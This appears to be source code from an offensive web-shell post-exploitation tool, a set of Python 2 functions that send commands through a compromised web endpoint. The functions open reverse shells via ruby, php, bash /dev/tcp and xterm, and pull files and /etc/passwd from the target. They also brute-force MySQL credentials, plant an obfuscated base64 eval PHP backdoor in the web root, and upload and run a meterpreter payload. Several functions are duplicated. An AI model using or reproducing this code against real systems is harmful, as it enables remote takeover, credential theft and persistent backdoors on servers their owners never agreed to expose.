def xterm(self, ip, port): cmd = "for x in `whereis xterm`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" xterm = make_request.get_page_source(cmd) if xterm: cprint('\n[i] Found xterm:', 'green') c = 1 for path in xterm: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 #raw_input('\n{0}[i] Make sure: \'{1}\' has a listener shell setup on port: \'{2}\'{4} (hint: python webhandler.py -l {2} OR nc -lvvp {2})\n{3}[?] Press <return> when ready!{4}'.format(Colors.GREEN, ip, port, Colors.YELLOW, Colors.END)) for path in xterm: cmd = 'nohup {0} xterm -display {1}:1 &echo "\n"'.format(path, ip) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find xterm on the remote system', 'red')
class FileHandler(object): # A method for downloading files from the box def download_file(self, rfile_path, lfile_path): cmd = 'if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi'.format( rfile_path) file_type = make_request.get_page_source(cmd) if file_type: file_type = file_type[0] if file_type == 'file': cmd = 'cat {0}'.format(rfile_path) try: with open(lfile_path, 'w') as dest_file: dest_file.write( '\n'.join(make_request.get_page_source(cmd)) + '\n') print '\n[+] Successfully downloaded "{0}" to "{1}"'.format( rfile_path, lfile_path) except IOError, e: cprint('\n[!] Error: {0}'.format(e), 'red') elif file_type == 'dir': cmd = 'find {0} | while read f;do echo $f;done'.format(rfile_path) files = make_request.get_page_source(cmd) for file in files: cmd = 'if [ -e {0} ]; then if [ -f {0} ]; then echo file; else echo dir; fi; fi'.format( file) file_type = make_request.get_page_source(cmd)[0] if file_type == 'dir': #folder = os.path.exists(os.path.join(lfile_path, file)) # Didn't like: @download /media/CD /root/ folder = lfile_path + file if not os.path.exists(folder): os.makedirs(folder) elif file_type == 'file': cmd = 'cat {0}'.format(file) try: #with open(os.path.join(lfile_path, file), 'w') as dest_file: # Didn't like: @download /media/CD /root/ with open(lfile_path + file, 'w') as dest_file: dest_file.write( '\n'.join(make_request.get_page_source(cmd)) + '\n') except IOError, e: cprint('\n[!] Error: {0}'.format(e), 'red') else: print colored('[!] Coudln\'t download the following file:', 'red'), file
def writable(self): cmd = "find {0} -writable -type d".format(linux.get_doc_root()) writable = make_request.get_page_source(cmd) if writable: c = 1 for path in writable: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 else: cmd = "if [ -w \"/tmp\" ];then echo \"WRITABLE\"; else echo \"NOT WRITABLE\"; fi" writable = make_request.get_page_source(cmd) if writable: cprint('[+] /tmp is a writable directory.', 'green') else: cprint('\n[!] Didn\'t find any wriable directories', 'red')
def ruby(self, ip, port): cmd = "for x in `whereis ruby`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" ruby = make_request.get_page_source(cmd) if ruby: cprint('\n[i] Found ruby:', 'green') c = 1 for path in ruby: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in ruby: cmd = 'nohup {0} -rsocket -e'.format(path) cmd += '\'f=TCPSocket.open("{0}",{1}).to_i;'.format(ip, port) cmd += 'exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find ruby on the remote system', 'red')
def php_cli(self, ip, port): cmd = "for x in `whereis php`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" php = make_request.get_page_source(cmd) if php: cprint('\n[i] Found php-cli:', 'green') c = 1 for path in php: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in php: cmd = 'nohup {0} -r '.format(path) cmd += '\'$sock=fsockopen("{0}",{1});'.format(ip, port) cmd += 'exec("/bin/sh -i <&3 >&3 2>&3");\' &echo "\n"' make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue') else: cprint('\n[!] Didn\'t find php-cli on the remote system', 'red')
def get_writble_dir(self): cmd = "find {0} -writable -type d 2>/dev/null | sort -R".format( self.get_doc_root()) # -print -quit result = make_request.get_page_source(cmd) if result: result = result[0] cprint('\n[+] Found a directory to use: \'{0}\''.format(result), 'green') else: path = '/tmp' cmd = "if [ -w \"%s\" ];then echo \"WRITABLE\"; fi" % path result = make_request.get_page_source(cmd) if result: result = path cprint('[+] /tmp is a writable directory.', 'green') else: cprint('\n[!] Unable to find a suitable directory', 'red') return result
def wait_connection(self): try: print banner print colored('\n[i] Waiting on port: ', 'green') + colored(str(self.port), 'yellow') server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', self.port)) server.listen(1) try: self.socket, self.address = server.accept() self.socket.setblocking(0) targetIP, targetPort = self.address cprint('[+] Received connection from: {0}'.format(targetIP), 'magenta') except KeyboardInterrupt: cprint('\n[!] Lost connection. Exiting...', 'red') except socket.error: cprint('\n[!] Wasn\'t able to open a port. Make sure to run WebHandler with a user which can (e.g. superuser)', 'red') exit(3)
def bash(self, ip, port): cmd = "for x in `whereis bash`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" bash = make_request.get_page_source(cmd) if bash: cprint('\n[i] Found bash:') c = 1 for path in bash: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in bash: cmd = 'nohup {0} -c \'{0} -i >& /dev/tcp/{1}/{2} 0>&1\' &'.format(path, ip, port) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue')
def bash(self, ip, port): cmd = "for x in `whereis bash`; do file $x | grep executable | awk '{print $1}' | tr -d ':'; done" bash = make_request.get_page_source(cmd) if bash: cprint('\n[i] Found bash:') c = 1 for path in bash: cprint('{0:2d}.) {1}'.format(c, path), 'green') c += 1 msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: python webhandler.py -l {1} OR nc -lvvp {1})' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) for path in bash: cmd = 'nohup {0} -c \'{0} -i >& /dev/tcp/{1}/{2} 0>&1\' &echo "\n"'.format(path, ip, port) make_request.get_page_source(cmd) if self.checkPort(port): break cprint('[+] Done!', 'blue')
def mysql(self): folder = linux.get_writble_dir() if folder: self.bruter_file = folder + "/mysql.php" self.wordlist = folder + "/wordlist.txt" cprint("\n[+] Uploading the bruter/wordlist ...", "green") file_handler.upload_file("modules/bruters/mysql_bruter.php", self.bruter_file) file_handler.upload_file("modules/bruters/wordlist.txt", self.wordlist) cmd = "cd {0}; php {1}".format(folder, self.bruter_file) cprint("\n[+] Brute-Forcing MySql Creds ...", "green") creds = make_request.get_page_source(cmd) creds = "".join(creds).split(":") if creds[0] == "success": username = colored(creds[1], "blue") password = colored(creds[2], "blue") print "[+] MySql Creds Username: {0} Password: {1}".format(username, password) else: cprint("[!] Couldn't brute-force MySql credentials", "red") self.clean()
def wait_connection(self): try: print banner print colored('\n[i] Waiting on port: ', 'green') + colored( str(self.port), 'yellow') server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', self.port)) server.listen(1) try: self.socket, self.address = server.accept() self.socket.setblocking(0) targetIP, targetPort = self.address cprint('[+] Received connection from: {0}'.format(targetIP), 'magenta') except KeyboardInterrupt: cprint('\n[!] Lost connection. Exiting...', 'red') except socket.error: cprint( '\n[!] Wasn\'t able to open a port. Make sure to run WebHandler with a user which can (e.g. superuser)', 'red') exit(3)
def mysql(self): folder = linux.get_writble_dir() if folder: self.bruter_file = folder + '/mysql.php' self.wordlist = folder + '/wordlist.txt' cprint('\n[+] Uploading the bruter/wordlist ...', 'green') file_handler.upload_file('modules/bruters/mysql_bruter.php', self.bruter_file) file_handler.upload_file('modules/bruters/wordlist.txt', self.wordlist) cmd = 'cd {0}; php {1}'.format(folder, self.bruter_file) cprint('\n[+] Brute-Forcing MySql Creds ...', 'green') try: creds = make_request.get_page_source(cmd) creds = ''.join(creds).split(':') if creds[0] == 'success': username = colored(creds[1], 'blue') password = colored(creds[2], 'blue') print '[+] MySql Creds Username: {0} Password: {1}'.format(username, password) else: cprint('[!] Couldn\'t brute-force MySql credentials', 'red') self.clean() except KeyboardInterrupt: self.clean()
def php(self, ip, ourIP): wwwroot = linux.get_doc_root() cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot) folder = make_request.get_page_source(cmd) if folder: folder = folder[0] cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green') filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php' cprint('[+] Filename: \'{1}\''.format(filename), 'green') location = '{0}/{1}'.format(folder, filename) cmd = 'find {0} -type f -print'.format(wwwroot) files = make_request.get_page_source(cmd) cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green') cprint(' 0.) Don\'t close - create new', 'green') path = [] c = 0 for file in files: path.append(file) c += 1 cprint('{0:2d}.) {1}'.format(c, file), 'green') while True: try: clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c)))) if 0 <= clone <= c: break except ValueError: pass if clone != 0: cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location) make_request.get_page_source(cmd) cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green') parameter = ''.join(choice(string.ascii_lowercase) for x in range(6)) casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval')))) caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode')))) payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter) payloadEncoded = b64encode(payload).format(payload) evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded) cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location) make_request.get_page_source(cmd) cprint('[+] Done!', 'blue') uri = folder[len(wwwroot):] #>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3]) #'https://localhost' url = '/'.join(getargs.url.split('/', 3)[:3]) example = """Example: curl "{url}{uri}/{filename}?{parameter}=phpinfo()" curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')" curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')" msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format( url=url, uri=uri, filename=filename, parameter=parameter, ourIP=ourIP,) cprint(example, 'green') else: cprint('\n[!] Unable to find a writable directory', 'red')
def passwd(self): cmd = 'cat /etc/passwd;' users = make_request.get_page_source(cmd) header = '{0:17} | {1:11} | {2:7} | {3:8} | {4:35} | {5:28} | {6}'.format( "Username", "Password", "User ID", "Group ID", "User Info", "Home Directory", "Shell", ) line = "-" * len(header) cprint('[+] Total number of users: {0}'.format(len(users)), 'magenta') cprint(line, 'green') cprint(header, 'green') cprint(line, 'green') c = 1 for user in users: uname = user.split(':')[0] passwd = user.split(':')[1] if passwd == "x": passwd = "*In shadow*" uid = user.split(':')[2] guid = user.split(':')[3] uinfo = user.split(':')[4] home = user.split(':')[5] shell = user.split(':')[6] cprint( '{0:17} | {1:11} | {2:7} | {3:8} | {4:35} | {5:28} | {6}'. format( uname, passwd, uid, guid, uinfo, home, shell, ), 'green') c += 1 cprint(line, 'green')
def group(self): cmd = 'cat /etc/group;' groups = make_request.get_page_source(cmd) header = '{0:15} | {1:11} | {2:8} | {3:8} |'.format( "Group Name", "Password", "Group ID", "Group List") line = "-" * len(header) cprint('[+] Total number of groups: {0}'.format(len(groups)), 'magenta') cprint(line, 'green') cprint(header, 'green') cprint(line, 'green') c = 1 for group in groups: gname = group.split(':')[0] passwd = group.split(':')[1] if passwd == "x": passwd = "*In shadow*" guid = group.split(':')[2] glist = group.split(':')[3] cprint( '{0:15} | {1:11} | {2:8} | {3:8} {4:2}|'.format( gname, passwd, guid, glist, ' '), 'green') c += 1 cprint(line, 'green')
def msf(self, ip, port): if len(Popen("for x in `whereis msfvenom`; do file $x | grep symbolic; done", shell=True, stdout=PIPE).stdout.read().strip()) == 0: cprint('\n[!] Wasn\'t able to detect the metasploit framework', 'red') else: cprint('\n[i] Found the metasploit framework:', 'green') folder = linux.get_writble_dir() if folder: filename = ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) cprint('[+] Filename: \'{0}\''.format(filename), 'green') path = '{0}/{1}'.format(folder, filename) msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green') msg += ' (hint: msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} E)' msg += colored('\n[?] Press <return> when ready!', 'yellow') raw_input(msg.format(ip, port)) cprint('[i] Generating linux/x86/meterpreter/reverse_tcp', 'green') shell = Popen('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf | base64'.format(ip, port), shell=True, stdout=PIPE).stdout.read().strip() cmd = 'echo "{0}" | base64 -i -d > {1} && chmod +x {1} && nohup {1} &echo "\n"'.format(shell, path) cprint('[+] Sending payload & executing', 'green') make_request.get_page_source(cmd) cprint('[+] Done!', 'blue')